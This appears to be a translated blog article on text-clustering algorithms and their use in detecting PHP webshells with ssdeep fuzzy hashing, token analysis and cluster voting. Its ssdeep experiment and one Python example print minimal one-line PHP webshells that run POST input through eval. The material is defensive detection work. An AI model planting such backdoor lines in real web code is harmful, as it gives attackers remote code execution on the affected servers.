Text Clustering, Malformed Webshell Detection
Catalog
1. Text Clustering
2. Clustering Algorithms
3. Text Clustering Procedure
4. Text Clustering Programming
5. Malformed Webshell Detection
6. Multi-class webshell clustering
7. Test of the demo prototype
8. Webshell recognition based on machine learning
9. Suspicion scoring based on file metadata
10. Coarse- and fine-grained webshell detection on client + server
11. Syntax And Lexical Analysis In WEBSHELL Detection (webshell detection based on lexical and syntactic analysis)
1. Text Clustering
Text clustering (document clustering) rests on the well-known cluster hypothesis:
1. Documents of the same class are highly similar to each other
2. Documents of different classes are less similar
Clustering is an unsupervised machine-learning method. It needs neither a training phase nor manually labelled categories, so it is flexible and highly automatable, and it has become an important means of organizing, summarizing and navigating text collections. Cluster analysis partitions a set of objects into clusters according to some rule; it uses no prior knowledge of the partition and no supervision, only the similarity between objects, to split a data set into several clusters.
By contrast, the supervised classification workflow that the rest of this article also draws on looks like this:
1. Provide a training data set (the training samples)
2. Express human experience as features (the dimensions to sample) and turn each sample into a feature vector (the abstracted numeric values). This is a modelling step: loosely structured text is abstracted into a fixed-format numeric vector
3. Train a suitable classifier on the data set and its feature vectors. This is where the open-source clustering and machine-learning toolkits differ most; each algorithm looks at the feature vectors and the samples under test from a different angle, but whatever the algorithm, the result is a quantifiable number (or array)
4. Evaluate the classification, e.g. precision and recall
5. Cross-validate the result (cross-validation)
There is nothing mysterious about machine learning: it is decision-making over many variables at once, where the machine uses numerical methods to find an approximately optimal solution under the constraints those variables impose.
0x1: Clusters
A classification task has to be told which samples are positive examples (positive samples) and which are negative examples (negative samples); what counts as positive or negative depends on the problem. In the webshell detection described here, the positive class is the normal website file and the negative class is the malicious webshell file (the reverse of the usual convention in malware detection, where the malicious class is the positive one; keep this in mind when reading the precision and recall figures later on).
Cluster: a set of data objects
1. Objects within one cluster are similar to each other
2. Objects in different clusters are dissimilar
0x2: Partitioning the data set
0x3: Mathematical description of cluster analysis
Cluster analysis (Clustering)
Given a sample set X = {X1, X2, ..., Xn}, the process of dividing it into K clusters {C1, C2, ..., Ck} according to the similarity between data points is called cluster analysis. A cluster is written Ci = {X^i_j1, X^i_j2, ..., X^i_jni}; each Ci (i = 1, ..., k) is a subset of X, and the clusters satisfy
1) C1 ∪ C2 ∪ ... ∪ Ck = X
2) Ci ∩ Cj = ∅ for i ≠ j
Similar samples end up in the same cluster, dissimilar samples in different clusters.
0x4: Applications
1. Document clustering can serve as a preprocessing step for natural-language applications such as multi-document summarization. A typical example is Newsblaster, the multi-document summarization system developed at Columbia University: it clusters the day's important news articles, then removes redundancy, fuses information and generates text across the documents of each topic to produce a concise summary
2. Clustering the results returned by a search engine so that users can locate what they need quickly. Hua-Jun Zeng et al. proposed a learning algorithm for clustering search results. Typical systems such as vivisimo and infonetware let the user enter query keywords, cluster the retrieved documents and output a short description of each cluster, narrowing the search so that the user only has to look at the promising topics; the clusters also give hints for a refined second query
3. Clustering the documents a user is interested in (for example the pages in the browser cache) to discover the user's interest profile, which can then drive information filtering and proactive recommendation
4. Clustering can also improve text classification results, as in the work of Y.C. Fang, S. Parthasarathy and F. Schwartz at Ohio State University
5. Digital-library services. With methods such as SOM neural networks, documents in a high-dimensional space can be mapped onto a two-dimensional plane while preserving topology, so that the clustering result can be visualized and understood, as in the SOMlib system
6. Automatic organization of document collections. Scatter/Gather, for example, is a cluster-based document browsing system, and Ji-Rong Wen et al. at Microsoft clustered the query logs submitted by users and used the result to update the search site's FAQ
0x5: Text clustering
1. Document Clustering (DC) is partitioning a set of documents into groups or clusters
2. Clusters should be computed to
1) Contain similar documents
2) Separate different documents as much as possible
3. For instance, if the similarity between documents is defined to capture "semantic relatedness", the documents in a cluster should deal with the same topics, and the topics should differ from cluster to cluster
Relevant Link:
http://baike.baidu.com/view/1133919.htm
http://www.zhihu.com/question/21070175
2. Clustering Algorithms
0x1: Partitioning methods
Given a data set of N tuples or records, a partitioning method builds K groups, each group representing one cluster, with K < N. The K groups satisfy the following conditions
1. Each group contains at least one record
2. Each record belongs to exactly one group (some fuzzy clustering algorithms relax this requirement)
3. For a given K, the algorithm first produces an initial grouping and then changes it by repeated iteration, so that each revised grouping is better than the previous one
The concrete procedure for splitting a document set D = {d1, ..., di, ..., dn} into classes is
1. Decide the number of classes K to generate
2. Generate k cluster centres as seeds according to some rule: S = {s1, ..., sj, ..., sk}
3. For every document di in D, compute its similarity to each seed sj: sim(di, sj)
4. Pick the seed with the largest similarity, arg max sim(di, sj), and assign di to the class Cj whose centre is sj, which yields a clustering of D: C = {c1, ..., ck}
5. Repeat steps 2 to 4 several times until the clustering becomes stable
The criterion for "better" is: records in the same group as close together as possible, records in different groups as far apart as possible. Algorithms built on this idea include
1. K-MEANS (k-means)
1) Choose an initial partition of k clusters containing random samples and compute the centroid of each cluster
2) Assign each remaining sample to the partition whose cluster centroid is nearest to it by Euclidean distance
3) Compute the mean vector of the samples assigned to each cluster and use it as the new centroid (this gradually produces roughly spherical regions of convergence)
4) Repeat steps 2 and 3 until the k centroids stop moving or the criterion function converges
2. K-MEDOIDS (k-medoids)
1) Instead of the mean of the samples in a cluster,
2) the object located most centrally in the cluster, the medoid, is used as the reference point
3. CLARANS
4. PAM (Partitioning Around Medoids)
1) One of the earliest k-medoids algorithms
2) Basic idea: after choosing k medoids at random, repeatedly try to find better medoids
PAM procedure
1) Randomly choose k representative objects as the initial medoids
2) repeat
3) Assign every remaining object to the cluster of its nearest medoid
4) Randomly choose a non-medoid object Orandom
5) Compute the total cost of replacing Oj with Orandom
6) If the total cost is negative, replace Oj with Orandom, forming a new set of k medoids
7) until no change occurs
1. k-means example
Weaknesses of k-means
1. The user must supply the number of clusters in advance, together with the initial partition, the update rule and the stopping criterion
2. It handles clusters of very different sizes, or non-convex clusters, poorly
3. It can only be used when the mean of a cluster is defined, which rules out data with categorical attributes
4. It is very sensitive to noise and outliers
5. It is fast, but k must be fixed beforehand and the seeds are hard to choose
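The k-means procedure above (steps 1 to 4), as an added example in plain Python; this is not code from the original post. The sample points are constructed: three tight blobs around (0,0), (10,10) and (20,0), interleaved so that the first three points come from three different blobs and can serve as a deterministic initial partition. Leaving `init` unset falls back to random seeding, which is exactly the weakness listed above: a bad seed can split one blob and merge two others, and k itself has to be chosen up front.

```python
import math
import random
from typing import List, Optional, Sequence, Tuple

Point = Tuple[float, float]

# Constructed sample: blobs are interleaved so that points 0, 1, 2 come from
# three different blobs (used below as a deterministic initial partition).
SAMPLE: List[Point] = []
for dx, dy in [(0.0, 0.0), (0.5, 0.3), (-0.4, 0.6), (0.2, -0.5), (-0.6, -0.2)]:
    SAMPLE.append((0 + dx, 0 + dy))      # blob A
    SAMPLE.append((10 + dx, 10 + dy))    # blob B
    SAMPLE.append((20 + dx, 0 + dy))     # blob C


def euclid(p: Point, q: Point) -> float:
    return math.hypot(p[0] - q[0], p[1] - q[1])


def nearest(p: Point, centroids: Sequence[Point]) -> int:
    """Step 2: index of the centroid closest to p."""
    return min(range(len(centroids)), key=lambda i: euclid(p, centroids[i]))


def mean_of(points: Sequence[Point]) -> Point:
    n = len(points)
    return (sum(p[0] for p in points) / n, sum(p[1] for p in points) / n)


def kmeans(points: Sequence[Point], k: int, init: Optional[Sequence[Point]] = None,
           seed: int = 0, max_iter: int = 100) -> Tuple[List[int], List[Point], int]:
    """Lloyd's iterations; returns (labels, centroids, iterations used).

    init: initial centroids (step 1).  If None, k random sample points are
    used; the result then depends on the seed, which is the weakness listed
    above, so callers who want a reproducible answer pass init explicitly.
    """
    if init is None:
        centroids = list(random.Random(seed).sample(list(points), k))
    else:
        centroids = list(init)
    labels = [-1] * len(points)
    for it in range(1, max_iter + 1):
        new_labels = [nearest(p, centroids) for p in points]   # step 2
        if new_labels == labels:                                # step 4: nothing moved
            return labels, centroids, it
        labels = new_labels
        for c in range(k):                                      # step 3: recompute means
            members = [p for p, lab in zip(points, labels) if lab == c]
            if members:            # an empty cluster keeps its previous centroid
                centroids[c] = mean_of(members)
    return labels, centroids, max_iter


def sse(points: Sequence[Point], labels: Sequence[int], centroids: Sequence[Point]) -> float:
    """Sum-of-squared-error criterion: the quantity Lloyd's iter­ations decrease."""
    return sum(euclid(p, centroids[lab]) ** 2 for p, lab in zip(points, labels))


if __name__ == "__main__":
    labels, centroids, iters = kmeans(SAMPLE, 3, init=SAMPLE[:3])
    print(labels, [tuple(round(v, 2) for v in c) for c in centroids], iters, sse(SAMPLE, labels, centroids))
```

With the deterministic seeds the first assignment is already the final one, so the second pass finds no change and the loop stops after two iterations; the SSE is what k-means minimises, and comparing it across several random seeds is the usual way to spot a bad initial partition.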
2. PAM algorithm
0x2: Hierarchical methods
These methods decompose the given data set hierarchically until some condition is met. They come in two flavours
1. Bottom-up (agglomerative) clustering:
1) Initially every record forms its own group; each subsequent iteration merges the groups that are closest to each other, until all records end up in one group or some condition is met
2) Every item starts as its own class
3) Iterate, merging the two nearest classes into one
Representative algorithms
1) BIRCH
2) CURE
3) CHAMELEON, etc.
2. Top-down (divisive) clustering
1) Treat all items as one class
2) Find the most dissimilar items and split them off into two classes
0x3: AGNES
1. Single-linkage (nearest neighbour)
1) The distance between two clusters is the smallest distance between any pair of samples drawn from the two clusters
2) The algorithm stops as soon as the distance between the two nearest clusters exceeds an arbitrary given threshold (i.e. it keeps the clusters as separate as possible)
2. Complete-linkage
3. Average-linkage
0x4: Density-based methods
The fundamental difference between density-based methods and the others is
1. Clustering methods based on the distance between samples can only find spherical clusters, whereas density-based methods can filter out "noise" (isolated points) and find clusters of arbitrary shape
2. Clustering continues as long as the density (number of samples) in the neighbourhood exceeds some threshold, i.e. for every sample in a given cluster, a region of a given radius must contain at least a certain number of samples
3. They are based on density rather than on some distance measure, which overcomes the limitation of distance-based algorithms to roughly circular clusters
4. The guiding idea is that whenever the density of points in a region exceeds a threshold, the region is added to the cluster adjacent to it
Definitions used in density-based clustering
1. The region within radius ε of an object is called that object's "ε-neighbourhood"
2. If the ε-neighbourhood of an object contains at least MinPts objects, the object is called a core object
3. Given a set of objects D, if p lies in the ε-neighbourhood of q and q is a core object, then p is directly density-reachable from q
4. If there is a chain of objects
1) p1, p2, ..., pn with p1 = q
2) and pn = p, where each pi ∈ D (1 <= i <= n) and pi+1 is directly density-reachable from pi with respect to ε and MinPts, then p is density-reachable from q with respect to ε and MinPts
5. If there is an object o in D such that both p and q are density-reachable from o with respect to ε and MinPts, then p and q are density-connected with respect to ε and MinPts
Representative algorithms
1. DBSCAN (Density-Based Spatial Clustering of Applications with Noise)
1) Pick any point p that has no cluster label yet
2) Find the ε-neighbourhood of p
3) If the ε-neighbourhood holds at least MinPts points (implementations differ on whether p itself is counted), p is a core object: start a new cluster and label every object reachable from it
4) Otherwise move on to the next point of the data set
5) Repeat until every point has been processed
2. OPTICS (Ordering Points To Identify the Clustering Structure)
1) An improvement on DBSCAN
1.1) Insensitive to the input parameters
1.2) Can find clusters of different densities
1.3) Presents the result visually, as a chart
1.4) Orders points by reachability distance
1.5) Can run automatically or interactively with the user
2) Compute the core distance and reachability distance of each point p
3) If p is a core object, find all points directly density-reachable from it with respect to ε and MinPts, sort them by reachability distance and insert them into the queue
4) Process the next point
3. DENCLUE, etc.
1. DBSCAN algorithm
Definitions used by DBSCAN
1. Cluster: a maximal set of density-connected objects, built on density reachability
2. Noise: an object that belongs to no cluster
3. Border object: an object that is not a core object but lies in a cluster, i.e. is directly reachable from at least one core object
Shortcomings of DBSCAN and improvements
1. It can only find clusters of similar density
2. It is sensitive to the user-supplied parameters
3. Its computational complexity is O(n^2)
4. With a spatial index such as an R-tree the complexity drops to O(n log n)
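The DBSCAN procedure and the cluster / noise / border definitions above, as an added example in plain Python (not code from the original post). The points are constructed: two dense patches, one border point that is within ε of a single core point and therefore gets absorbed but never expanded from, and one isolated point that ends up as noise. The O(n^2) cost mentioned above is visible in `region_query`, which scans every point; an R-tree would replace that scan.

```python
import math
from typing import Dict, List, Optional, Sequence, Tuple

Point = Tuple[float, float]
NOISE = -1

# Constructed sample data.
PATCH_A: List[Point] = [(0, 0), (0.5, 0), (1, 0), (0, 0.5), (0.5, 0.5), (1, 0.5)]
BORDER: Point = (1.7, 0)          # within eps of (1, 0) only, so never a core point
OUTLIER: Point = (5, 5)           # no neighbours at all -> noise
PATCH_B: List[Point] = [(x + 10, y + 10) for x, y in PATCH_A]
SAMPLE: List[Point] = PATCH_A + [BORDER, OUTLIER] + PATCH_B


def region_query(points: Sequence[Point], idx: int, eps: float) -> List[int]:
    """Indices of all points in the eps-neighbourhood of points[idx], itself included.
    Linear scan: this is where the O(n^2) comes from without a spatial index."""
    px, py = points[idx]
    return [j for j, (qx, qy) in enumerate(points) if math.hypot(px - qx, py - qy) <= eps]


def dbscan(points: Sequence[Point], eps: float, min_pts: int) -> List[int]:
    """Returns one cluster id per point, NOISE (-1) for points in no cluster.

    A point is a core point when its eps-neighbourhood holds at least min_pts
    points counting itself (scikit-learn's convention).  A cluster is grown
    from a core point through directly density-reachable neighbours; a
    border point is labelled when reached but not expanded from.
    """
    labels: List[Optional[int]] = [None] * len(points)   # None = not visited yet
    cluster = 0
    for i in range(len(points)):
        if labels[i] is not None:
            continue
        neigh = region_query(points, i, eps)
        if len(neigh) < min_pts:
            labels[i] = NOISE           # may be relabelled later as a border point
            continue
        labels[i] = cluster
        queue = [j for j in neigh if j != i]
        while queue:
            j = queue.pop()
            if labels[j] == NOISE:
                labels[j] = cluster     # border point: reachable, but not core
            if labels[j] is not None:
                continue
            labels[j] = cluster
            j_neigh = region_query(points, j, eps)
            if len(j_neigh) >= min_pts: # j is core: keep expanding through it
                queue.extend(m for m in j_neigh if labels[m] is None or labels[m] == NOISE)
        cluster += 1
    return [NOISE if lab is None else lab for lab in labels]


def summarize(labels: Sequence[int]) -> Dict[int, int]:
    """Cluster id -> size, so the caller sees how many clusters and how much noise."""
    out: Dict[int, int] = {}
    for lab in labels:
        out[lab] = out.get(lab, 0) + 1
    return out


if __name__ == "__main__":
    result = dbscan(SAMPLE, eps=0.8, min_pts=3)
    print(result, summarize(result))
```

With ε = 0.8 and MinPts = 3 the two patches become clusters 0 and 1, the border point joins cluster 0 through the core point (1, 0), and the outlier stays noise. Shrinking ε to 0.4 turns every point into noise, which is the parameter sensitivity listed above; there is no "right" ε without knowing the data's density.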
2. OPTICS algorithm
0x5: Grid-based methods
1. The data space is divided into rectangular cells
2. There are cells at different levels, corresponding to different resolutions: each cell at a higher level is divided into several cells at the next lower level
3. Statistics for each cell are precomputed and stored for answering queries
4. The method first divides the data space into a grid of finitely many cells and then does all its processing on individual cells
5. The big advantage is speed: the processing time is usually independent of the number of records in the target database and depends only on the number of cells the space is divided into
Representative algorithms
1. STING
2. CLIQUE (Clustering In QUEst)
1) Divide the data space into disjoint rectangular cells and record the number of objects in each
2) Use the a-priori property to identify the subspaces that contain clusters
3) Identify the clusters:
3.1) Find the dense cells in the subspaces of interest
3.2) Find the connected dense cells in those subspaces
4) Identifying dense cells
4.1) A-priori property: if a k-dimensional cell is dense, its projection onto (k-1)-dimensional space is dense too
4.2) So for a candidate dense cell in k dimensions, if any of its (k-1)-dimensional projections is not dense, the k-dimensional cell cannot be dense either
3. WAVE-CLUSTER
1. CLIQUE algorithm
0x6: Model-based methods
A model-based method assumes a model for each cluster and then looks for the data that best fit that model. The model may be a density distribution function of the points in space, or something else. The underlying assumption is that the target data set is generated by a set of probability distributions. There are two usual directions
1) statistical approaches (for example the word-frequency statistics of a text)
2) neural-network approaches
0x7: Distance between documents
Vector Space Model
1. M unordered index terms ti (features): stems, words, phrases or other units
2. Every document dj is represented by a vector of index terms: (a1j, a2j, ..., aMj)
3. Weight computation over N training documents: the matrix A(M*N) = (aij)
4. Similarity computation
1) cosine similarity
2) inner product
0x8: Distance between clusters
The distance Dpq between cluster Gp and cluster Gq can be defined by
1. the single-linkage (minimum) distance
2. the complete-linkage (maximum) distance
3. the centroid distance
4. Ward's criterion (sum of squared deviations)
5. the average-linkage distance
0x9: Identifying almost identical files using context triggered piecewise hashing
Homologous files share identical sequences of bits in the same order. Because such files are not completely identical, traditional techniques such as cryptographic hashing cannot be used to identify them.
1. Piecewise hashing
Originally developed by Nicholas Harbour for dcfldd (Harbour, 2002), piecewise hashing uses an arbitrary hashing algorithm to create many checksums for a file instead of just one. Rather than generating a single hash for the entire file, a hash is generated for many discrete fixed-size segments of the file. For example, one hash is generated for the first 512 bytes of input, another hash for the next 512 bytes, and so on.
2. The rolling hash
A rolling hash algorithm produces a pseudo-random value based only on the current context of the input. The rolling hash works by maintaining a state based solely on the last few bytes of the input. Each byte is added to the state as it is processed and removed from the state after a set number of other bytes have been processed.
3. Combining the hash algorithms
Whereas current piecewise hashing programs such as dcfldd use fixed offsets to determine when to start and stop the traditional hash algorithm, a CTPH algorithm uses the rolling hash. When the output of the rolling hash produces a specific output, or trigger value, the traditional hash is triggered. That is, while processing the input file, one begins to compute the traditional hash for the file. Simultaneously, one must also compute the rolling hash for the file. When the rolling hash produces a trigger value, the value of the traditional hash is recorded in the CTPH signature and the traditional hash is reset.
Consequently, each recorded value in the CTPH signature depends only on part of the input, and changes to the input will result in only localized changes in the CTPH signature.
For instance, if a byte of the input is changed, at most two, and in many cases only one, of the traditional hash values will be changed; the majority of the CTPH signature will remain the same. Because the majority of the signature remains the same, files with modifications can still be associated with the CTPH signatures of known files. The flip side matters for webshell detection: an attacker who re-orders or rewrites most of a known shell, or pads it with junk, moves most of the trigger points and the signature no longer matches, so fuzzy hashing catches minor variants of known samples, not genuinely new ones.
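The rolling hash, trigger and piecewise hash combination described above, as an added example in Python. This is not ssdeep's code and not the post's: it reuses ssdeep's rolling-hash recurrence and its FNV-1 constants, but it uses one fixed block size, records one base64 character per chunk, and scores with a longest-common-subsequence ratio instead of ssdeep's edit distance (real ssdeep also picks the block size from the file length and emits two signatures at adjacent block sizes). The sample input is a constructed PHP-like text with one byte flipped in the middle, which lets the locality property be checked directly: chunks that end before the change and chunks that start more than a window after it are identical in both signatures.

```python
from typing import List, Tuple

ROLLING_WINDOW = 7              # the rolling hash only ever sees the last 7 bytes
FNV_PRIME = 0x01000193          # ssdeep's traditional (piecewise) hash is FNV-1, 32 bit
FNV_INIT = 0x28021967
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


class RollingHash:
    """State depends only on the last ROLLING_WINDOW bytes seen."""

    def __init__(self) -> None:
        self.window = [0] * ROLLING_WINDOW
        self.h1 = self.h2 = self.h3 = 0   # h1: sum, h2: age-weighted sum, h3: shift/xor
        self.n = 0

    def update(self, c: int) -> int:
        self.h2 -= self.h1
        self.h2 += ROLLING_WINDOW * c
        self.h1 += c - self.window[self.n % ROLLING_WINDOW]   # drop the byte leaving the window
        self.window[self.n % ROLLING_WINDOW] = c
        self.n += 1
        self.h3 = ((self.h3 << 5) & 0xFFFFFFFF) ^ c   # bytes older than 7 steps have shifted out
        return (self.h1 + self.h2 + self.h3) & 0xFFFFFFFF


def piecewise_chunks(data: bytes, block_size: int = 64) -> List[Tuple[int, int, str]]:
    """Split data at rolling-hash triggers; return (start, end, hash_char) per chunk.

    FNV-1 runs over the current chunk.  When the rolling hash hits the trigger
    value (block_size - 1 modulo block_size) one base64 character of the FNV
    state is recorded and FNV is reset, exactly the combination described above.
    """
    roll = RollingHash()
    fnv = FNV_INIT
    chunks: List[Tuple[int, int, str]] = []
    start = 0
    for i, c in enumerate(data):
        fnv = ((fnv * FNV_PRIME) & 0xFFFFFFFF) ^ c
        if roll.update(c) % block_size == block_size - 1:
            chunks.append((start, i, B64[fnv & 0x3F]))
            fnv = FNV_INIT
            start = i + 1
    if start < len(data):                          # bytes after the last trigger
        chunks.append((start, len(data) - 1, B64[fnv & 0x3F]))
    return chunks


def signature(data: bytes, block_size: int = 64) -> str:
    return "%d:%s" % (block_size, "".join(ch for _, _, ch in piecewise_chunks(data, block_size)))


def lcs_length(a: str, b: str) -> int:
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if x == y else max(prev[j], cur[j - 1]))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """0..100: share of chunk hashes the two signatures have in common, in order.
    Signatures at different block sizes are not comparable and score 0."""
    bs_a, body_a = sig_a.split(":", 1)
    bs_b, body_b = sig_b.split(":", 1)
    if bs_a != bs_b or not body_a or not body_b:
        return 0
    return 100 * lcs_length(body_a, body_b) // max(len(body_a), len(body_b))


# Constructed sample: a PHP-like file, then the same file with one byte changed.
SAMPLE = b"".join(
    b"$v%d = base64_decode('%s');\n" % (i, b"QUJD" * (i % 5 + 1)) for i in range(120)
) + b"eval($_POST['op']);\n"
CHANGE_INDEX = len(SAMPLE) // 2
MODIFIED = SAMPLE[:CHANGE_INDEX] + b"#" + SAMPLE[CHANGE_INDEX + 1:]

if __name__ == "__main__":
    print(signature(SAMPLE))
    print(similarity(signature(SAMPLE), signature(MODIFIED)))
```

Because the rolling hash after byte i depends only on bytes i-6..i, a change at position i can only add or remove trigger points in positions i..i+6; every chunk boundary outside that window, and therefore every chunk hash on either side of it, is unchanged. That is the whole reason a one-byte edit costs at most two characters of the signature.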
Relevant Link:
http://www.icst.pku.edu.cn/course/mining/12-13spring/TextMining05-%E8%81%9A%E7%B1%BB.pdf
http://dfrws.org/2006/proceedings/12-Kornblum.pdf
3. Text Clustering Procedure
0x1: Basic steps of text clustering
As with other text-processing tasks, DC has several steps
1. Document representation
2. Dimensionality reduction
3. Applying a clustering algorithm
4. Evaluating the effectiveness of the process
0x2: Evaluating the clustering result
1. Precision (P)
2. Recall (R)
3. F-measure
4. Overall evaluation across all classes
5. Macro average
6. Micro average
7. Sum-of-squared-error criterion
0x3: Evaluating a clustering algorithm
1. Whether the algorithm can discover some or all of the hidden patterns
2. The algorithm must produce high-quality clusters, which means
1) high intra-cluster similarity
2) low inter-cluster similarity
3. The quality of the result depends on
1) the similarity measure the algorithm uses
2) how the algorithm is implemented
4. Scalability
5. Ability to find clusters of arbitrary shape
6. As little domain knowledge as possible needed to set the input parameters
7. Insensitivity to the order of the input objects
8. Ability to handle noise and outliers
9. Ability to handle different attribute types
10. Ability to handle high-dimensional data
11. Producing a good result that satisfies user-specified constraints
12. A result that is interpretable, understandable and usable
4. Text Clustering Programming
0x1: ssdeep
ssdeep is a program for computing context triggered piecewise hashes (CTPH). Also called fuzzy hashes, CTPH can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length.
Usage: ssdeep [-m file] [-k file] [-dpgvrsblcxa] [-t val] [-h|-V] [FILES]
1. -m: Match FILES against known hashes in file
2. -k: Match signatures in FILES against signatures in file
3. -d: Directory mode, compare all files in a directory
4. -p: Pretty matching mode. Similar to -d but includes all matches
5. -g: Cluster matches together
6. -v: Verbose mode. Displays filename as it is being processed
7. -r: Recursive mode
8. -s: Silent mode; all errors are suppressed
9. -b: Uses only the bare name of files; all path information omitted
10. -l: Uses relative paths for filenames
11. -c: Prints output in CSV format
12. -x: Compare FILES as signature files
13. -a: Display all matches, regardless of score
14. -t: Only displays matches above the given threshold
15. -h: Display this help message
16. -V: Display version number and exit
Experiment (commands as typed on Windows, output shown below each command)

type shell.php
<?php
..
eval($_POST['op']);
?>

ssdeep.exe -b webshell_hash/shell.php > result_hashs.txt
type result_hashs.txt
ssdeep,1.1--blocksize:hash:hash,filename
96:KZVnaQSZyEhzFviSMEiSMiuDBd2633s8Us4qX9FGpTqXNFKCQZqX9FnTr1CoiyD:KZVaDZyEhzFXi26M8sbcDD,"shell.php"

// match the file against itself (necessarily scores 100)
ssdeep.exe -bm result_hashs.txt webshell_hash/shell.php
shell.php matches result_hashs.txt:shell.php (100)

// modify the webshell
type shell1.php
<?php
..
eval($_POST['pwd']);
//owned by LittleHann
?>

ssdeep.exe -bm result_hashs.txt webshell_hash/shell1.php
shell1.php matches result_hashs.txt:shell.php (99)

// add the newly confirmed webshell to the hash signature library
ssdeep.exe -b webshell_hash/shell1.php >> result_hashs.txt

// keep iterating on the grown library and check further webshells
type shell2.php
<?php
..
eval($_POST['e7xue']);
//owned by hacker
?>

ssdeep.exe -bm result_hashs.txt webshell_hash/shell2.php
shell2.php matches result_hashs.txt:shell.php (99)
shell2.php matches result_hashs.txt:shell1.php (99)

// the webshell under test matches the library signatures closely
0x2: PHP ssdeep fuzzy hashing
ssdeep is a utility for creating and comparing fuzzy hashes, or context-triggered piecewise hashes.
Fuzzy hashing can match signatures which have "...sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length".
The PECL extension exposes this to PHP as functions for creating and comparing fuzzy hashes (ssdeep_fuzzy_hash, ssdeep_fuzzy_hash_filename and ssdeep_fuzzy_compare).
0x3: NeoPI
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
NeoPI recursively scans through the file system from a base directory and will rank files based on the results of a number of tests. It also presents a “general” score derived from file rankings within the individual tests.
Relevant Link:
http://ssdeep.sourceforge.net/
http://pecl.php.net/package/ssdeep
http://danqingdani.blog.163.com/blog/static/1860941952014111291954550/
https://github.com/Neohapsis/NeoPI
5. Malformed Webshell Detection
In intrusion attack and defence the webshell is a primary vehicle, and webshell detection driven by real-time notification of file creation and modification is a key defensive measure. Coarse-grained detection of suspected webshells on the client (the monitored host) faces several difficulties, however
1. Backup, copy and unpack operations by the administrator on the server can change a large number of files at once
2. Normal operation of the site produces many temporary, cache, upload and configuration files
3. Normal web files often contain code that looks like webshell or backdoor functionality; thanks to the flexibility of PHP, the features of some webshells are almost indistinguishable from normal files, e.g. PHP's dynamic function call mechanism
4. The attacker inserts the webshell code into an existing, legitimate site file
0x1: Coarse-grained client-side detection of suspected webshells
The idea is a combination of checks that go progressively deeper
1. Upload the file under test
2. Exact match against a library of known MD5 hashes. The library is split into "YES WEBSHELL" and "NOT WEBSHELL" entries, so it can separate known normal files and known webshells with certainty
1) MD5 match result "YES WEBSHELL"
2) MD5 match result "NOT WEBSHELL"
3. Webshell detection by weighted string and regex matching (each string rule carries a weight, and the verdict is based on the total score)
4. Preprocessing with PHP token (lexical) analysis to turn encoded webshells (e.g. Base64, ROT13) back into plain text
1) Parse the file under test into its token sequence
2) Recursively look for decoding nodes (e.g. base64_decode)
3) Apply the corresponding decoding to the string that follows each captured decoding node
4) The result is that a webshell using an encoding layer (e.g. base64) is decoded into a plain-text PHP file
5. After preprocessing (decoding), run the full webshell regex and weighted string scoring. If it matches, stop and report; if not, continue with the following checks
6. Token-based backtracking of dangerous function calls and their variables
1) Lexical analysis yields all tokens of the PHP code
2) From the tokens, collect every function call and trace back the arguments it uses
3) From the tokens, collect every variable assignment, i.e. the backward tracing step
4) Once a variable has been traced back to its origin, match keywords; a direct hit on a malicious pattern means a malicious file
5) Once a call is known to be malicious, fetch its arguments: constants are shown directly, variables are traced back again
7. Detection of the dynamic function calls that webshells often use
1) Look for "("; if what is to the left of it is a variable or an identifier, save it
2) Then match the arguments to the right of "(" one by one and extract them
3) If an argument is a variable, trace it back
4) Match the traced value with regexes or strings; if the fully traced value is a webshell it necessarily contains malicious features
8. If all of the previous checks fail, a final round uses the clustering result: fuzzy matching with the ssdeep algorithm
1) An interface is exposed for uploading the file under test
2) After the check, a result ("YES WEBSHELL" or "NOT WEBSHELL") is returned and the record is marked as pending confirmation (is_check = 0)
3) Security staff periodically confirm the pending webshells; from each confirmed new webshell, features are extracted into the feature library, namely
3.1) MD5, marked is_webshell = 1 / 0 (for deciding with certainty that a file is or is not a webshell)
3.2) ssdeep hash, marked is_webshell = 1 / 0 (for fuzzy matching)
4) In the initial learning phase the algorithm is fed a large number of webshell samples, and their ssdeep hash signatures form the reference feature library
5) Each file under test is compared with every entry in the ssdeep hash library, giving two result arrays, each element being the fuzzy-hash comparison score between the file under test and one library entry
5.1) ssdeep_hash -> is_webshell = 1: the "yes webshell" cluster result
5.2) ssdeep_hash -> is_webshell = 0: the "not webshell" cluster result
6) Count the scores above 90 in each array; the array with more of them wins, i.e. the side the clustering result leans towards, which serves as the confidence
0x2: Setting up the database
// create the database
CREATE DATABASE webshell_detection;
// 1. table webshell_scan (one row per uploaded file)
id
filename
original_filename
uploadtime
is_check
is_webshell
// 2. table md5_hash (exact-match library)
id
md5_hash
is_webshell
// 3. table ssdeep_hash (fuzzy-match library)
id
ssdeep_hash
is_webshell
0x3: Code
http://files.cnblogs.com/files/LittleHann/ssdeep.zip
0x4: The clustering-based learning loop
The point of the improvement is
1. It replaces the old operational flow in which the server side reviewed webshell records, extracted features and pushed rule updates to the clients
2. Instead, the server side only reviews the suspected webshells that are reported and confirms them manually
3. The detection rate on the client goes up and the false-positive rate goes down
The key to the ssdeep clustering approach is the large number of samples learned up front: the ssdeep hash library has to be "fed" many normal files and many webshell files so that it forms two reasonably compact cluster centres
6. Multi-class webshell clustering
0x1: The problem with two-class clustering
The traditional approach uses binary classification, i.e. the samples are split into only two classes. When malformed samples show up, this produces false positives and false negatives easily
1. In the initial sample set, webshells and normal site files have clearly distinct features; in terms of the fuzzy hash, the distance between the samples is large
2. As soon as "webshells inserted into normal files" and "big webshells" are fed into the ssdeep engine, the picture changes: the defining property of these two kinds is that their fuzzy hashes differ very little from normal site files. Picture a cluster plot in which there used to be two point sets far apart; now scattered points appear in the space between them
3. After this training, the false-positive rate actually rises: many normal site files are identified as webshells, and many webshells as normal files
0x2: Directions for improvement
1. Extend the current two-cluster model into a multi-class model. Since webshell text files come in many types, there may be 4 or 5 groups; the file under test is clustered against each class, then a vote picks the class with the most votes
1) one-line webshells
2) big webshells
